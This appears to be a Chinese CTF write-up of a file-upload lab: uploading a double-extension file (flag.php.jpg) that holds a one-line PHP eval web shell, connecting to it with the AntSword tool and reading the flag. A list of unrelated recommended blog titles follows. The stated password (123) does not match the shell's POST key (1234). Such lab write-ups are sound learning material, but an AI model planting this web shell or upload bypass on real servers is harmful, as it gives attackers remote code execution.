题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
房屋安全鉴定检测2 小时前
房屋安全鉴定报告有效期多久房屋安全鉴定检测3 小时前
房屋安全鉴定需要什么条件FLS1685 小时前
Kali搭建sqli-labs靶场不是三毛没有半5 小时前
华为USG6000v2 NAT模式下IPSEC IKE V1 实验Suckerbin8 小时前
LAMPSecurity: CTF6靶场渗透房屋安全鉴定检测12 小时前
房屋安全鉴定注意事项房屋安全鉴定检测12 小时前
房屋安全鉴定机构服务内容晓衣17 小时前
2025“獬豸杯”全国电子数据取证竞赛-k8s服务器取证wplingggggaaaa1 天前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVEjieyu11191 天前
内网后渗透攻击--linux系统(权限维持)